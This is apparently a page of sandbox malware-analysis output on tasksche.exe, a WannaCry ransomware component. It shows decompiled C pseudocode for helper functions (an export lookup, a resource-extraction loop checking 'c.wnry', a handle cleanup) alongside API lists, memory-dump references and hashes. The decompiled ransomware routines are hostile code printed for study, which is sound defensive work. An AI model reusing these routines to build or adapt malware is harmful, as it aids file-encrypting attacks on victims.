                                                                                0x00405c11
                                                                                0x00405c9a
                                                                                0x00405c9e
                                                                                0x00405c9e

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Pointer$??2@Create
                                                                                • String ID:
                                                                                • API String ID: 1331958074-0
                                                                                • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                                                                                • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
                                                                                • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                                                                                • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00402924(intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t32;
				signed int _t33;
				signed int _t37;
				signed short* _t41;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				void* _t59;

				_t26 = _a4;
				_t44 =  *((intOrPtr*)(_t26 + 4));
				_t28 =  *_t26 + 0x78;
				_v8 = _t44;
				if( *((intOrPtr*)(_t28 + 4)) == 0) {
					L11:
					SetLastError(0x7f);
					_t29 = 0;
				} else {
					_t58 =  *_t28;
					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
					_t59 = _t58 + _t44;
					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
						goto L11;
					} else {
						_t8 =  &_a8; // 0x402150
						if( *_t8 >> 0x10 != 0) {
							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
							_a4 = 0;
							if(_t30 <= 0) {
								goto L11;
							} else {
								while(1) {
									_t32 =  *_t55 + _t44;
									_t15 =  &_a8; // 0x402150
									__imp___stricmp( *_t15, _t32);
									if(_t32 == 0) {
										break;
									}
									_a4 = _a4 + 1;
									_t55 = _t55 + 4;
									_t41 =  &(_t41[1]);
									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
										_t44 = _v8;
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								_t33 =  *_t41 & 0x0000ffff;
								_t44 = _v8;
								goto L14;
							}
						} else {
							_t9 =  &_a8; // 0x402150
							_t37 =  *_t9 & 0x0000ffff;
							_t49 =  *((intOrPtr*)(_t59 + 0x10));
							if(_t37 < _t49) {
								goto L11;
							} else {
								_t33 = _t37 - _t49;
								L14:
								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
									goto L11;
								} else {
									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
								}
							}
						}
					}
				}
				L12:
				return _t29;
			}

















                                                                                0x00402928
                                                                                0x0040292f
                                                                                0x00402934
                                                                                0x00402938
                                                                                0x0040293e
                                                                                0x004029a5
                                                                                0x004029a7
                                                                                0x004029ad
                                                                                0x00402940
                                                                                0x00402940
                                                                                0x00402942
                                                                                0x00402946
                                                                                0x0040294a
                                                                                0x00000000
                                                                                0x00402951
                                                                                0x00402951
                                                                                0x0040295a
                                                                                0x00402971
                                                                                0x00402973
                                                                                0x00402977
                                                                                0x0040297a
                                                                                0x00000000
                                                                                0x0040297c
                                                                                0x00402981
                                                                                0x00402983
                                                                                0x00402986
                                                                                0x00402989
                                                                                0x00402993
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402995
                                                                                0x00402998
                                                                                0x0040299f
                                                                                0x004029a3
                                                                                0x0040297e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004029a3
                                                                                0x004029b4
                                                                                0x004029b7
                                                                                0x00000000
                                                                                0x004029b7
                                                                                0x0040295c
                                                                                0x0040295c
                                                                                0x0040295c
                                                                                0x00402960
                                                                                0x00402965
                                                                                0x00000000
                                                                                0x00402967
                                                                                0x00402967
                                                                                0x004029ba
                                                                                0x004029bd
                                                                                0x00000000
                                                                                0x004029bf
                                                                                0x004029c8
                                                                                0x004029c8
                                                                                0x004029bd
                                                                                0x00402965
                                                                                0x0040295a
                                                                                0x0040294a
                                                                                0x004029af
                                                                                0x004029b3

                                                                                APIs
                                                                                • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
                                                                                • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_stricmp
                                                                                • String ID: P!@
                                                                                • API String ID: 1278613211-1774101457
                                                                                • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                                                • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                                                                                • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                                                • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E00401DFE(void* __eax) {
				int _t21;
				signed int _t27;
				signed int _t29;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t43;

				_t36 = __eax;
				_t41 = _t40 + 0xc;
				if(__eax != 0) {
					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
					_t29 = 0x4a;
					memset(_t38 - 0x128, 0, _t29 << 2);
					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
					_t27 =  *(_t38 - 0x12c);
					_t43 = _t41 + 0x18;
					_t34 = 0;
					if(_t27 > 0) {
						do {
							E004075C4(_t36, _t34, _t38 - 0x12c);
							_t21 = strcmp(_t38 - 0x128, "c.wnry");
							_t43 = _t43 + 0x14;
							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
								E0040763D(_t36, _t34, _t38 - 0x128);
								_t43 = _t43 + 0xc;
							}
							_t34 = _t34 + 1;
						} while (_t34 < _t27);
					}
					E00407656(_t36);
					_push(1);
					_pop(0);
				} else {
				}
				return 0;
			}












                                                                                0x00401dfe
                                                                                0x00401e00
                                                                                0x00401e05
                                                                                0x00401e0e
                                                                                0x00401e1a
                                                                                0x00401e21
                                                                                0x00401e2d
                                                                                0x00401e32
                                                                                0x00401e38
                                                                                0x00401e3b
                                                                                0x00401e3f
                                                                                0x00401e41
                                                                                0x00401e4a
                                                                                0x00401e5b
                                                                                0x00401e60
                                                                                0x00401e65
                                                                                0x00401e82
                                                                                0x00401e87
                                                                                0x00401e87
                                                                                0x00401e8a
                                                                                0x00401e8b
                                                                                0x00401e41
                                                                                0x00401e90
                                                                                0x00401e96
                                                                                0x00401e98
                                                                                0x00401e07
                                                                                0x00401e07
                                                                                0x00401e9d

                                                                                APIs
                                                                                • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                                                                                • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFilestrcmp
                                                                                • String ID: c.wnry
                                                                                • API String ID: 3324900478-3240288721
                                                                                • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                                                • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                                                                                • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                                                • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405C9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00405C9F(signed int __eax, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				if(_t9 != 0) {
					if( *((char*)(_t9 + 0x10)) != 0) {
						CloseHandle( *(_t9 + 4));
					}
					_push(_t9);
					L004076E8();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}




                                                                                0x00405ca0
                                                                                0x00405ca6
                                                                                0x00405cb1
                                                                                0x00405cb6
                                                                                0x00405cb6
                                                                                0x00405cbc
                                                                                0x00405cbd
                                                                                0x00405cc6
                                                                                0x00405ca8
                                                                                0x00405cac
                                                                                0x00405cac

                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@CloseHandle
                                                                                • String ID: $l@
                                                                                • API String ID: 3816424416-2140230165
                                                                                • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                                                • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                                                                                • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                                                • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004019E1 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 25%
                                                                                			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				void* _t16;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					L3:
					return 0;
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
				_push(_t19);
				if(_t13 != 0) {
					LeaveCriticalSection();
					memcpy(_a12, _a4, _a8);
					 *_a16 = _a8;
					_t16 = 1;
					return _t16;
				}
				LeaveCriticalSection();
				goto L3;
			}







                                                                                0x004019e5
                                                                                0x004019ec
                                                                                0x00401a19
                                                                                0x00000000
                                                                                0x00401a19
                                                                                0x004019ee
                                                                                0x004019f2
                                                                                0x00401a08
                                                                                0x00401a10
                                                                                0x00401a11
                                                                                0x00401a1d
                                                                                0x00401a2c
                                                                                0x00401a3a
                                                                                0x00401a3e
                                                                                0x00000000
                                                                                0x00401a3e
                                                                                0x00401a13
                                                                                0x00000000

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Entermemcpy
                                                                                • String ID:
                                                                                • API String ID: 3435569088-0
                                                                                • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                                                • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
                                                                                • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                                                • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%